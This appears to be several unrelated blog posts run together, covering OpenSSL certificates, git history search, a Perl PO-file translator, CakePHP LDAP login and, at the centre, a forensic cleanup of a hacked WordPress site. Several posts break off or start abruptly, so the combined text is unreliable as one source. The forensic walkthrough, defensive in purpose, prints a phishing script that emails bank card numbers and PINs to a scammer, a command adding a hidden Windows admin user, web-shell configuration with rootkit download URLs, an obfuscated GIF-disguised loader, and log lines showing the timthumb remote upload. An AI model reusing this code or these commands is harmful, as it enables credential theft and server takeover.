First you need to understand the basic overview of how HTTPS (SSL/TLS) works.    To create a SSL certificate you need to create three things.  First the private key, this private key is used by the webserver to decrypt traffic that comes in.  You will need to use this private key to generate a certificate signing requests.  This requests takes a finger print of your key and prepares a formal request that goes to the CA (The person who issues you the actual certificate) of your choosing.  This request is called the CSR or certificate signing request.  The CA or certificate authority is then supposed to verify you are who you say you are then they sign your CSR and return it to you.  This returned file is the certificate.

Note the following commands assume you have the openssl tools installed on your computer.  If you are using a mac or linux computer these are usually installed by default.

Step 1) Generate a private Key

openssl req -new  -newkey rsa:2048 -nodes -keyout yourdomain.com.key

So this is going to create a create a new RSA key that is 2048 bits long and has now passphrase (nodes).  If you require a passphrase on your cert ommit the -nodes.  Not that if your key has a passphrase you will need to be there to enter the password into your webserver each time it recycles. When you run this command it’s going to ask you several questions such as Country, State, City, Organization Name, Organization Unit Name, Common Name etc.  The country name should just be the two letter abbreviation, everything else should be fullname (Do not abbreviate).  The common name is the most important part of this step.  This needs to be the exact domain name you want for the certificate.  So if your site is www.yourdomain.com your common name should be www.yourdomain.com Then the CSR is created later that is the domain they are going to verify against.  Most CA’s are nice enough to make your certificate work with www and with just the base name.  Be sure to ask them to do that as it is very helpful.

Last you should be very careful with this key file.  It is your secret key that is used to decrypt data encrypted with your cert.  If someone else gets this then your SSL is useless and they can see all of your encrypted connections.  The only person you should ever share this private key with is your hosting company.  They will need the Key and the final cert to install into the webserver that will host your site.

Step 2) Create a CSR from your key

openssl req -out yourdomain.com.csr -key yourdomain.com.key -new

This command takes the previously created key and prepares the CSR we discussed earlier.  The yourdomain.csr will be the file you send to the CA to verify

Create a self signed certificate

If you will not be using an official certificate authority to sign your certificate then you can just do the famous self signed.  If you have a self signed certificate then you will get a warning when visiting the site that the certificate could not be validated.  What does that mean?  It ‘s simple browsers have a list of Certificate Authorities they trust, you are not one of them for by default they can’t say your trusted.  Fear not though, your data is still encrypted, it’s just saying you did this certificate your self and no verified you are who you say you are.

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout yourdomain.com.key -out yourdomain.com.crt

One thing you need to keep in mind if you have a repo with more then one branch you may need to switch branches to search the different commit histories

Pay dirt!

[analog@dev htdocs]# git grep 'display_pri' $(git rev-list --all)
6e6242576c9e4874b0edbb0cceb9adec1b380a47:.upgradeScripts/displayPrice.php:                                              $json['prices'][$i]['display_price'] = 1;
6e6242576c9e4874b0edbb0cceb9adec1b380a47:.upgradeScripts/displayPrice.php:                                              $json['prices'][$i]['display_price'] = 0;

So what are we doing here? I’m asking git to search all the commits listed with git rev-list –all for a string that contains display_pri Right away you see it finds a commit that has some code with that string. Now we can use git checkout 6e6242576c9e4874b0edbb0cceb9adec1b380a47 to switch to that commit like we would a branch. Do not commit anything in this branch/commit. You are now in a detached HEAD, this means that if you commit from here you could overwrite other code and be in the same boat all over again. Instead checkout the commit in a different place and copy the code to a new current branch to add it back

This perl script requires a few modules from CPAN listed here

• LWP::Curl
• URI::Escape
• JSON

For this script to be useful for you, you need to have a google api v2 API key from google. The new v2 api requires you to pay for translations.  The upside is, currently it doesn’t cost much.  About $20USD for 2,000,000 characters.  Using this script I was able to translate about 20k words in about 15min.

To get started you must have a google account with translate api access.  Go to the google api console Click on service an activate Translate API service.  Next click on API Access and generate a Server API key and give it your static IP for it to lock access to.  Once it generates an API key for you place that in the header of the following script in the $api_key var

 
[crayon lang=”perl”]
#!/usr/bin/perl

use strict;
use warnings;
use LWP::Curl;
use URI::Escape;
use JSON -support_by_pp;

use File::Slurp;

my $version = ‘0.1’;
my %opt;
my $api_key = ‘YOUR GOOGLE api v2 key here’;
my $googleTransLateURL = ‘https://www.googleapis.com/language/translate/v2’;

sub init(){
use Getopt::Std;
my $opt_string = ‘hVl:s:f:o:’;
getopts( “$opt_string”, \%opt ) or usage();
if($opt{V}){
print $version.”\n”;
exit;
}

usage() if $opt{h};
usage() if !$opt{f};
main();
}

sub usage(){
print STDERR <<"EOF"; Automated tool to take a PO file and use google translate to translate each string in the file. $0 [-V] -f

-f The po file you want to translate.
-l The language you want it translated to
-s Source Language of text, defaults to en
-h This Help screen
-V Version
EOF
exit;
}

init();

sub main(){

processFile($opt{f});
}

sub processFile(){
my $file = shift();

my @poFile = read_file($file);

my $i = 0;
foreach my $line (@poFile){
if($line =~ m/^msgid “”$/){
print $i;
}elsif($line =~ m/^msgid “(.*)”$/){
my $translateString = ‘msgstr “‘.transLate($1).'”‘.”\n”;
$i++;
print $line;
print $translateString;
}elsif($line =~ m/^msgstr/){
#skipp empty string, get it from above
next();
}else{
# normal line print it as usual
print $line;
}
}
}

sub transLate(){
my $string = shift();

my ($sLang, $targetLang, $translatedString);

if(!$opt{s}){
$sLang = ‘en’
}else{
$sLang = $opt{s};
}

if(!$opt{l}){
print “ERROR: No target language was specified.\n”;
usage();
}else{
$targetLang = $opt{l};
}

my $lwpcurl = LWP::Curl->new();

my $args = ‘?key=’.$api_key.’&source=’.$sLang.’&target=’.$targetLang.’&q=’.uri_escape($string);
#for now we are testing our loop logic
my $content = $lwpcurl->get($googleTransLateURL.$args);
my $json = new JSON;

my $json_text = $json->allow_nonref->utf8->relaxed->escape_slash->loose->allow_singlequote->allow_barekey->decode($content);

foreach my $trans (@{$json_text->{data}->{translations}}){
#ok, get the translated string now
$translatedString = $trans->{translatedText};
}

return($translatedString);
}
[/crayon]
 

If you run the script without any arguments it will give you the following usage

Automated tool to take a PO file and use google translate to translate each string in the file.

./googleTranslate.po.pl [-V] -f

-f The po file you want to translate.
-l The language you want it translated to
-s Source Language of text, defaults to en
-h This Help screen
-V Version

Here is how I use the script to generate a spanish version of my gettext po file

./googleTranslate.po.pl -f default.po -l ‘es’ > es.po

The plugin utilizes the ecommerce_feeder plugin to import the items to your WP-e-Commerce store.

Prerequisites

In order to use this plugin you will need to already have the Ecommerce Feeder plugin installed and activated.    As well as WP-e-Commerce

First things first, be calm don’t make any harsh decisions.  Seriously, your first instinct will be to delete the site right away.  Don’t do that, you have a great advantage right now.  The hacker probably doesn’t know that you know yet.  This is your perfect opportunity to start gathering as much information as you can.

So first step, copy your website and access_log & error_log off your webserver to another computer to start looking them over.  If you can export a copy of your database also then do that as well.  Next lets make a record of who is connected right now,  do a netstat -an and redirect the output to a text file for later viewing.

Now we still don’t want to remove any files, but we do want to make sure that our site isn’t being used for malicious purposes.  So we will limit access to the site to ourselves for a while.  Go to the root of your website and create a .htaccess file with the following in it

order deny,allow
deny from all
allow from 192.168.1.5 #this should be whatever your current IP is

Now it’s time to get to the sleuthing part to discover what happened.  The first thing we should look for is new files – suspicious files.  To do this we have a few options, one is to use the built in find command in Linux.

find . -ctime -7 > list

This command says: show me all the files changed in the last seven days. You may need to go further back then seven days, but one week is a good place to start.  Start going through this list and look for files that don’t look like normal blog files.  Basically, you’re looking for anything that is some sort of script (*.php, *.js, *.pl, *.cgi), if your using IIS look for new asp files also.  Any new scripts that have appeared on your server should be very suspicious!

In one example I discovered the following files recently had their status changed.

wordpress/mod_status.php
wordpress/wp-content/themes/identification.007.php
wordpress/wp-content/themes/identification.php
wordpress/wp-content/themes/mambo.php
wordpress/wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php
wordpress/wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php
wordpress/wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php
wordpress/wp-content/themes/dt-chocolate/cache/6de6dbf331c00df4d652ae9eb9a90bcc.php
wordpress/wp-content/themes/dt-chocolate/cache/939eb3a34a3d191de76a00351712a316.php
wordpress/wp-content/themes/dt-chocolate/cache/header.php
wordpress/wp-content/themes/dt-chocolate/cache/renm.php

Let’s take a look at the files one by one and see what they are and what they do.

First file mod_status.php this file when we look at it sends up flags right away that it’s going to be suspicious.  Right away we see in this script that it is making some sort of connection off to other servers and the files were generated with Microsoft frontpage.  This tells us that these are your normal wordpress files.  I also  see in this file that it has instructions to go and download other files.  So why not go download these files to your backup directory? We should also investigate further what the goal was.

Another thing I noticed was this line

"$newuser = '@echo off;net user Admin /add /expires:never
/passwordreq:no;net localgroup "Administrators"
/add Admin;net localgroup "Users" /del Admin';"

This was a really interesting attempt.  They were trying to see if they could add their own user to you Windows domain.  What this basically means is that if you were running this in IIS it would have tried to use the computers domain account to create a new admin user for true remote access.  Since this was a Linux computer and not part of a domain, we ignore it and move on.

The next file we look at is identification.007.php  after seeing this file, I know exactly what their goal was in this attack.  They wanted to use this site in a phishing attack.  This means they host a fake site on our server to try to gather information about other people.  Perhaps they are trying to gather bank account or credit card numbers by spamming users and having them come to your site and type in their sensitive information.  That way when it finally gets tracked down, you are to blame while each result was being emailed to them all along.

Remember how we said it was important that you don’t delete any files?  Well, this is why.  We now have proof that we weren’t the ones trying to steal people’s private information.  We also have records to show people where the information was sent to.  Lets keep going now.

identification.php this is the script that takes all the results from the phishing form and emails it off to the scammer christinewebb@gala.net We may want to have fun with this later

$to = "christinewebb@gala.net";
//-----------------------------------
$accountNumber = $_POST['accountNumber'];
$cardNumber = $_POST['cardNumber'];
$dod = $_POST['dod'];
$dom = $_POST['dom'];
$doy = $_POST['doy'];
$uwpin = $_POST['uwpin'];
$naam = $_POST['naam'];
$adres = $_POST['adres'];
$postcode = $_POST['postcode'];
$Toegangscode1 = $_POST['Toegangscode1'];
$ip = $_SERVER['REMOTE_ADDR'];
$subj = "ABN ";
$msg = "Rekeningnummer : $accountNumber\nPasnummer : $cardNumber\nUw PIN: $uwpin\nGeboortedatum: $dod-$dom-$doy\nNaam: $naam\nAdres: $adres\nPostcode: $postcode\nMobiel Telefoonnummer: $Toegangscode1\nIp : $ip";
$from = "FROM: ABN";

                        {

                mail($to,$subj,$msg,$from);

                                }

                    header("location: http://www.abnamro.nl");

Moving on, mambo.php when looking at this file we see just a bunch of garbage.

eval(gzinflate(base64_decode('
7f15f+K4sjgO/38/n/se......

This is highly suspect, this right away tells us that someone is trying to hide something. What you see in the beginning says the following code is bas64 encoded (MIME encoded) and gzip. You only see this in one of two situations: One is in commercial software when they are trying to hide/obfuscate the source code, the other is when an attacker is trying to hide a malicious script from forensic tools like malware/virus scanners. The good thing is that this is a really week method to hide the code. Go to http://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php and pass it the code here is what our decrypted version would look like

Looking at the decrypted version tells me something very important. First, the attacker used a pre-made tool and secondly they wanted more than just to run a phishing site; they were trying to trojan this computer to keep using it.

#######################################
## FaTaLisTiCz_Fx Fx29Sh 2.0.09.08   ##
define('sh_ver',"2.0.09.08");        ##
## By FaTaLisTiCz_Fx                 ##
## ? 03-09 2008 FeeLCoMz Community   ##
## Written under PHP 5.2.5           ##
#######################################
$sh_name = sh_name();                ##
#######################################
#$sh_mainurl        = "http://localhost/FX29SH/";
$sh_mainurl        = "http://uaedesign.com/xml/";
$fx29sh_updateurl  = $sh_mainurl."fx29sh_update.php";
$fx29sh_sourcesurl = $sh_mainurl."fx29sh.txt";
$sh_sourcez = array(
  "Fx29Sh"   => array($sh_mainurl."cyberz.txt","fx29sh.php"),
  "psyBNC"   => array($sh_mainurl."fx.tgz","fx.tgz"),
  "Eggdrop"  => array($sh_mainurl."fxb.tgz","fxb.tgz"),
  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
$auth = array(
  "login"     => "",
  "pass"      => "",
  "md5pass"   => "",
  "hostallow" => array("*"),
  "denied"    => "".$sh_name.": access denied!",
);
##[ END AUTHENTICATION ]##
$curdir = "./";
$tmpdir = "";
$tmpdir_logs = "./";
$log_email = "shell.shell99@yahoo.com";
$sess_cookie = "fx29shcook";
$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
$usefsbuff = TRUE;
$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
$surl_autofill_include = TRUE;
$updatenow   = FALSE;
$gzipencode  = TRUE;
$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
$hexdump_lines = 8;
$hexdump_rows = 24;
$millink = milw0rm();
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = getdisfunc();
##[ END OF CONFIGS ]##

So the fact that the attacker used a pre-made tool tells us they were not experienced enough to do it on their own, and/or they used an automated scanning tool to find their vulnerable file and compromise the machine. The fact that the version of FaTaLisTiCz_Fx Fx29Sh is older (from 2008) and that a quick google search finds a much newer version confirms that they didn’t have the skill to do it on their own and they didn’t write this script. It also tells us that they probably have been using this script for a few years…at least.

Now that I know they tried to install much more malicious code, I want to stop right now and run some basic scans for trojans, viruses and rootkits on this server. Because the files they listed their (Eggdrop, Binddoor, Fx29sh & psyBNC) are known rootkits. Go to www.chkrootkit.org/ download the chkrootkit and run it right away; it knows how to detect almost all of these root kits. Also right now start looking at your access_log to see if they actually ran this script and what they were able to do with it.

When I checked this system, it looked like they were not able to do much of anything. The sysadmin had taken some proper precautions and installed SuPHP. This limits the web server to run only as the php user who owns the files, it also prevents php from leaving the document root, kind of like a chroot. An analysis of the chkroot says no root kits where found. A deeper scan of the system says no backdoors were installed. This is very lucky. If a backdoor had been found, then their is no telling how far the attack had gone and your best course of action would have been to backup the system and start a rebuild. Once an attacker has elevated their privileges your system security is done.

Also, looking through the access log shows that this script was never accessed and greping through the webtree shows it wasn’t included in any other script (“Assuming the other scripts we haven’t explored yet aren’t also encoded like mambo”)

Next file ffe37f6533095659017bd96829adf796.php right away we see some shenanigans again

GIF89a?????ˇˇˇ!˘????,???? ? ?? ?;? ?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/...

This time, what we see is that they tried to make this file look like some sort of gif to trick a sanity check into believing that it is a gif and not a malicious code. Using our decode method discussed earlier, the scripts that are embeded are as follows.

ffe37f6533095659017bd96829adf796.decoded.part1
ffe37f6533095659017bd96829adf796.decoded.part2
ffe37f6533095659017bd96829adf796.decoded.part3

 
After looking at these scripts I can tell that the first two are just to do enumeration. That means they are trying to see what commands your PHP supports as well as what version of php you are using. The third script however, is trying to upload any file it wants to, to your web path. We can deduce that this may have been how they got into the system.
So I’m going to grep through the access log and see if I’m right.

 116.197.2.185 - - [21/Jan/2012:08:01:22 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)" 116.197.4.30 - - [22/Jan/2012:21:28:21 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)" 

Sure enough it looks like this script was indeed called, but how did this script get there? Based off of the logs, we now have a time frame and user agent to start looking through our logs. Right away I start noticing the other files I discovered that they uploaded such as:

116.197.4.30 - - [22/Jan/2012:20:02:48 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 200 8862 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:20:02:50 -1000] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:27:48 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 200 8864 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/69fe6694b6c6f71234f258694f02434c.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:27:52 -1000] "GET /favicon.ico HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:21 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/ffe37f6533095659017bd96829adf796.php HTTP/1.1" 200 354 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:34 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php HTTP/1.1" 200 6275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:28:45 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/ HTTP/1.1" 200 6374 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:29:09 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/header.php HTTP/1.1" 200 1252 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:29:22 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/header.php HTTP/1.1" 200 1379 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/header.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:30:02 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/ HTTP/1.1" 200 6421 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/fb2bcd0fe34afef8c36427a5224e5983.php?http://virtual.uarg.unpa.edu.ar/myftp/list.txt?&action=upload&chdir=/home/asynonymous/rdecojewelry.com/htdocs/cms/wp-content/themes/dt-chocolate/cache/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:10 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 7514 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:45 -1000] "POST /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 2540 "http://www.rdecojewelry.com/cms//wp-content/themes/dt-chocolate/cache/renm.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

116.197.4.30 - - [22/Jan/2012:21:37:57 -1000] "GET /cms//wp-content/themes/dt-chocolate/cache/renm.php HTTP/1.1" 200 7144 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.3)"

Bam, their we go, we now see exactly what they were doing. They were using those scripts in the cache directory to download other files to the system and get them in place to run their scam. They are also using their new files to move other files all over the system.

But how did the original php scripts get into the cache directory, and what is with that odd filename? Looking though the access log further, I see several really odd requests.

213.198.35.81 - - [22/Jan/2012:13:32:38 -1000] "GET /cms/who-is-r-deco-jewelry//wp-content
/themes/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 
- "-" "Mozilla/5.0   (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:34:57 -1000] "GET /cms/blog//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-" "Mozilla/5.0   
(Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:35:02 -1000] "GET /cms//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 400 184 "-" 
"Mozilla/5.0   (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

213.198.35.81 - - [22/Jan/2012:13:35:16 -1000] "GET /cms//wp-content/uploads/thumb-
temp/69fe6694b6c6f71234f258694f02434c.php HTTP/1.1" 301 - "-" "Mozilla/5.0   (Windows; U; 
Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"

86.148.157.95 - - [22/Jan/2012:14:55:35 -1000] "GET /cms/return-policies//wp-content/themes
/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-" 
"Mozilla/5.0 (Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

86.148.157.95 - - [22/Jan/2012:15:00:56 -1000] "GET /cms/return-policies//wp-content/themes
/dt-chocolate/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 301 - "-" 
"Mozilla/5.0 (Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

86.148.157.95 - - [22/Jan/2012:15:01:01 -1000] "GET /cms//wp-content/themes/dt-chocolate
/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1" 400 184 "-" "Mozilla/5.0 
(Windows; U; Windows NT   5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

What is that? It seems they are calling the thumb.php script and passing it as a URL. If we go download that file at http://blogger.com.nilgirisrealty.com/cok.php we see that same exact gif exploit in the header of the script. This makes sense now. They were using the thump.php script (which is used to dynamically make thumbnails and cache them in the cache directory) to upload their malicious scripts and then called them based off of a dynamically assigned name they were given.

Going through the reset of the files in the cache directory, I see they have embedded Trojan horse script to try to bind backdoor install. Once again due to the webserver configuration this was not possible to run.

To insure they didn’t get their backdoor on this computer, I used lsof to check for open ports and running processes on my machine. Thanks to Dre @ http://www.securityaegis.com/ for pointing our that you should also use lsof +L1 to detect any running processes that have had their files deleted after starting. This is a great way to hide your backdoor. Start your program, once it’s running remove the executable. Then a scanner can’t see it. You’re program would only be running in memory then. Also since I ran chkroot and a virus scan and both of those turned up clean as well as the fact that I didn’t discover any other new files, I now know the full extent of the attack.

I’ve gone through and decoded each of the files they uploaded into the cache directory as well as other parts of the system and used the access_log to discover all the files they uploaded. Now that I know the full extent of the attack I can start to clean up the system.

Clean up Time

Remove malicious files

Now that we know all the files that were uploaded we are going to start repairing the system. I’m going to remove all the newly created files as well as the thumb.php script that was used for the initial attack. I actually discovered after a little bit of research that the thumb.php file was actually the well known timthumb script. The theme developer had just stripped out the header originally and that is why it wasn’t recognized earlier. Let this be a lesson to all programmers: If you use someone else’s code, you better damn well give them credit! Especially if it has known vulnerabilities, this way vulnerability scanners can detect it easier. So I downloaded the most recent version (as of this writing 2.8.5) which has this vulnerability patched and replaced the file.

Restore original vendor files.

Replace all plugins and core WordPress files with the originals just in case a core file was modified and you didn’t detect it. You may even want to check if there is a new version of your theme available for update. Be sure that if you do update your theme that it doesn’t contain the same vulnerability.

Security Salt & Nounces

One of the first things you need to do before you turn your site back on is update your security strings inside wordpress/wp-config.php see https://api.wordpress.org/secret-key/1.1/salt/ That URL will generate you new salt’s and nounces.

MySQL Security

Also, since they got access to your wordpress site, you should change the password for your wordpress db user and go through your database and make sure no malicious scripts where injected into your post. How to do that is outside the scope of this article, but if you need a consultant I’m happy to help.

Conclusion

It sucks getting hacked, and if you use your site to do business it can be very expensive getting compromised. If you feel like you need professional help cleaning up a site, we can help. Use the About section above to get in touch with us.

Also, see our article on how to secure your site before it gets hacked.

You can get the new code at https://github.com/analogrithems/idbroker/tree/dev_cake2.0

To get things going download the idbroker code from github and place it in your  plugin folder App/Plugin/Idbroker pay attention to the new capital first letter.  This is a new convention for the CakePHP 2.0 to help in automatic class loading.

Now in your App/Controller/AppController.php you need a minimal of the following

[php]
<?php
class AppController extends Controller {
var $components = array(‘Auth’, ‘Session’, ‘RequestHandler’);

var $user;

function beforeFilter(){
global $menus;
$this->Auth->authenticate = array(‘Idbroker.Ldap’=>array(‘userModel’=>’Idbroker.LdapAuth’));
//If you want to do your authorization from the isAuthorized Controller use the following
$this->Auth->authorize = array(‘Controller’);
}

/*
* This just says aslong as this is a valid user let them in, you can also modify this to restrict to a group
*/
public function isAuthorized(){
$user = $this->Auth->user();
if($user) return true;
return false;
}
}
[/php]

Notice:That in the components you define the Auth component. This is making all your controllers register the authentication component. In the beforeFilter you are specifically stating you want to use the Idbroker’s Ldap Auth. Then you’re also telling your app to use the prepackaged model for the LDAP component.

The next step is to configure your Users controller and your views.

In your /App/Controller/UsersController.php

[php]
<?php
class UsersController extends AppController {
var $name = ‘Users’;

/*
* Make sure to define which functions don’t require auth to be accessed
*/
function beforeFilter(){
$this->Auth->allow(‘usernameExists’, ‘forgotPassword’, ‘signup’,’login’,’logout’);
parent::beforeFilter();
}

function login(){
if ($this->request->is(‘post’)) {
if ($this->Auth->login()) {
return $this->redirect($this->Auth->redirect());
} else {
$this->Session->setFlash(__(‘Username or password is incorrect’), ‘default’, array(‘class’=>’error-message’), ‘auth’);
}
}
}

function logout(){
$this->log("Destroying session",’debug’);
$this->Session->destroy();
$this->redirect($this->Auth->logout());
}
}
[/php]

You’ll notice compared to previous version of the authcomponent you used to just have the Auth component automatically do the auth, now you actually call $this->Auth->login() to get it to actually check the username and password and run the login logic.

We’re not done yet, we also need to create our view /App/View/Users/login.ctp

[php]
<div id=’loginForm’>
<?php
echo $this->Session->flash(‘auth’);
echo $this->Form->create(‘Users’, array(‘action’ => ‘login’));
echo $this->Form->input(‘username’);
echo $this->Form->input(‘password’,array(‘value’=>”));
echo $this->Form->input(‘remember’,array(‘type’ => ‘checkbox’, ‘label’ => ‘Remember me’));
echo $this->Form->submit(‘Login’);
?>
</div>
[/php]

Last piece to tie this all together is telling your application how to access your LDAP server. Add something like this to youyr /App/Config/database.php

[php]
<?php
class DATABASE_CONFIG {
public $ldap = array (
‘datasource’ => ‘Idbroker.LdapSource’,
‘host’ => ‘localhost’,
‘port’ => 389,
‘basedn’ => ‘DC=example,DC=com’,
‘login’ => ‘CN=Manager,DC=example,DC=com’, //For Proxy Userdn
‘password’ => ‘LdapPassword’, //For Proxy UserDN password
‘database’ => ”,
‘tls’ => false,
‘type’ => ‘OpenLDAP’, //Available types are ‘OpenLDAP’, ‘ActiveDirectory’, ‘Netscape’
‘version’ => 3
);
}
[/php]

And in your /App/Config/bootstrap.php add the following to the very bottom

[php]
CakePlugin::load(‘Idbroker’);
Configure::load(‘ldap’);
[/php]

These two lines tell your app to first load the Idbroker plugin and then load the ldap config file which you will create next.

Then create an ldap config file /App/Config/ldap.php with the following. This config file will configure how Ldap is used through out your app.

[php]
/**
* LDAP Settings
*
*/
$config[‘LDAP’][‘Db’][‘Config’] = ‘ldap’; //What is the name of the db config that has the LDAP credentials
$config[‘LDAP’][‘User’][‘Identifier’] = ‘uid’; //What is the LDAP attribute that identifies the username attribute,
// openldap, iplant, netscapr use uid, AD uses samaccountname
$config[‘LDAP’][‘Group’][‘Identifier’] = ‘cn’; //What is the LDAP attribute that identifies the group name, usually cn
$config[‘LDAP’][‘Model’] = ‘Idbroker.LdapAuth’; //Default model to use for LDAP components
$config[‘LDAP’][‘LdapAuth’][‘Model’] = ‘Idbroker.LdapAuth’;
$config[‘LDAP’][‘LdapAuth’][‘MirrorSQL’][‘Users’] = ‘User’; //A SQL table to duplicate ldap records in for user
$config[‘LDAP’][‘LdapAuth’][‘MirrorSQL’][‘Groups’] = ‘Group’; //A SQL table to duplicate LDAP records in for groups
$config[‘LDAP’][‘LdapACL’][‘Model’] = ‘Idbroker.LdapAcl’;
$config[‘LDAP’][‘LdapACL’][‘groupType’] = ‘group’;
$config[‘LDAP’][‘groupType’] = ‘groupofuniquenames’; //What object class do you use for your groups?
$config[‘LDAP’][‘Group’][‘behavior’][‘tree’][‘parent_id’] = ’49db8df1-5e74-4e91-b15f-4d33e927f14e’; //Are you using a tree behavior? Need to set the default parent_id?
[/php]

That last part was a lot, not all of that is needed. Really just the first line is $config[‘LDAP’][‘Db’][‘Config’] = ‘ldap’; – this part tells your application which database config to use for LDAP. The other config options are for new extended features that I will explain below.

When creating this plugin I made use of the new extended features to allow you to use the HTTP basic authentication. In this method you can actually pass your username and password credentials in the http request header. This is useful for allowing command line tools like wget & curl to access authorized parts of your application. It is also used for rest applications.

Another new features that has been added to this Auth Component is the ability to have Ldap Auth mirror a SQL table. What this means is that if you really want to have your user information in SQL but just have authentication come from Ldap you can do that. You need to add the following configuration options to the bootstrap.php These tell it which Models to use to mirror the data to and what the LDAP identifiers are for the data.

[php]
$config[‘LDAP’][‘LdapAuth’][‘MirrorSQL’][‘Users’] = ‘User’; //A SQL table to duplicate ldap records in for user
$config[‘LDAP’][‘LdapAuth’][‘MirrorSQL’][‘Groups’] = ‘Group’; //A SQL table to duplicate LDAP records in for groups
